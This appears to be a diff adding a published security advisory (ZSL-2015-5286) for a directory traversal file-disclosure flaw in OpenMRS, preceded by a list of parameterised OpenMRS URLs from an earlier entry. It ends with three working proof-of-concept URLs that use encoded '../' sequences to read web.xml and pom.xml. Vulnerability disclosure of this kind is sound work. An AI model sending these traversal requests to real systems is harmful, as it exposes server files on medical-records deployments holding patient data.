http://127.0.0.1:8080/openmrs/uicommons/messages/get.action [codes parameter]
http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form [description parameter]
http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form [name parameter]
http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form [parameterName parameter]
http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form [parentUUID parameter]
http://127.0.0.1:8080/openmrs/admin/reports/cohortReport.form [reportId parameter]
http://127.0.0.1:8080/openmrs/admin/reports/reportMacros.form [macros parameter]
http://127.0.0.1:8080/openmrs/admin/reports/reportSchemaXml.form [reportSchemaId parameter]
http://127.0.0.1:8080/openmrs/admin/reports/reportSchemaXml.form [xml parameter]
http://127.0.0.1:8080/openmrs/admin/reports/runReport.form [schedule parameter]
http://127.0.0.1:8080/openmrs/dictionary/concept.form [namesByLocale%5Ben%5D.name parameter]
http://127.0.0.1:8080/openmrs/module/reporting/viewPortlet.htm [id parameter]
http://127.0.0.1:8080/openmrs/module/reporting/widget/getMappedAsString.form [cancelCallback parameter]
http://127.0.0.1:8080/openmrs/module/reporting/widget/getMappedAsString.form [label parameter]
http://127.0.0.1:8080/openmrs/module/reporting/widget/getMappedAsString.form [saveCallback parameter]
http://127.0.0.1:8080/openmrs/module/reporting/widget/getMappedAsString.form [valueType parameter]
http://127.0.0.1:8080/openmrs/module/metadatasharing/export/edit.form [type parameter]
http://127.0.0.1:8080/openmrs/admin/orders/orderDrug.form [concept parameter]
http://127.0.0.1:8080/openmrs/admin/orders/orderDrug.form [instructions parameter]
http://127.0.0.1:8080/openmrs/admin/orders/orderDrug.form [orderType parameter]
http://127.0.0.1:8080/openmrs/admin/orders/orderDrug.form [patient parameter]
http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [addAge parameter]
http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [personType parameter]
http://127.0.0.1:8080/openmrs/admin/person/addPerson.htm [viewType parameter]
http://127.0.0.1:8080/openmrs/admin/scheduler/scheduler.form [description parameter]
http://127.0.0.1:8080/openmrs/admin/scheduler/scheduler.form [name parameter]
http://127.0.0.1:8080/openmrs/admin/scheduler/scheduler.form [taskClass parameter]
http://127.0.0.1:8080/openmrs/admin/scheduler/scheduler.list [taskId parameter]
http://127.0.0.1:8080/openmrs/dictionary/concept.form [namesByLocale%5Ben%5D.name parameter]
http://127.0.0.1:8080/openmrs/dictionary/concept.form [namesByLocale%5Ben_GB%5D.name parameter]
http://127.0.0.1:8080/openmrs/dictionary/concept.form [namesByLocale%5Bfr%5D.name parameter]
http://127.0.0.1:8080/openmrs/dictionary/concept.form [namesByLocale%5Bht%5D.name parameter]
http://127.0.0.1:8080/openmrs/dictionary/concept.form [synonymsByLocale%5Ben%5D%5B0%5D.name parameter]
http://127.0.0.1:8080/openmrs/module/logic/editRuleDefinition.form [description parameter]
http://127.0.0.1:8080/openmrs/module/logic/editRuleDefinition.form [name parameter]
http://127.0.0.1:8080/openmrs/module/logic/editRuleDefinition.form [ruleContent parameter]
http://127.0.0.1:8080/openmrs/module/logic/logic.form [patientId parameter]
http://127.0.0.1:8080/openmrs/patientDashboard.form [patientGraphConcept parameter]

45
platforms/xml/webapps/38899.txt Executable file
View file

@ -0,0 +1,45 @@
OpenMRS 2.3 (1.11.4) Local File Disclosure Vulnerability
Vendor: OpenMRS Inc.
Product web page: http://www.openmrs.org
Affected version: OpenMRS 2.3, 2.2, 2.1, 2.0 (Platform 1.11.4 (Build 6ebcaf), 1.11.2 and 1.10.0)
OpenMRS-TB System (OpenMRS 1.9.7 (Build 60bd9b))
Summary: OpenMRS is an application which enables design
of a customized medical records system with no programming
knowledge (although medical and systems analysis knowledge
is required). It is a common framework upon which medical
informatics efforts in developing countries can be built.
Desc: OpenMRS suffers from a file disclosure vulnerability
when input passed thru the 'url' parameter to viewPortlet.htm
script is not properly verified before being used to include
files. This can be exploited to include files from local
resources with directory traversal attacks.
Tested on: Ubuntu 12.04.5 LTS
Apache Tomcat/7.0.26
Apache Tomcat/6.0.36
Apache Coyote/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5286
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5286.php
Vendor: https://talk.openmrs.org/t/openmrs-security-advisories-2015-11-30/3868
02.11.2015
--
http://127.0.0.1:8080/openmrs/module/reporting/viewPortlet.htm?id=reportDesignPortlet&url=..%2f..%2f..%2fWEB-INF%2fweb.xml%3bx%3d
http://127.0.0.1:8080/openmrs/module/reporting/viewPortlet.htm?id=reportProcessorPortlet&url=..%2f..%2f..%2fWEB-INF%2fweb.xml%3bx
http://127.0.0.1:8080/openmrs/module/reporting/viewPortlet.htm?id=reportDesignPortlet&url=..%2f..%2f..%2fMETA-INF%2fmaven%2forg.openmrs.web%2fopenmrs-webapp%2fpom.xml%3bx%3d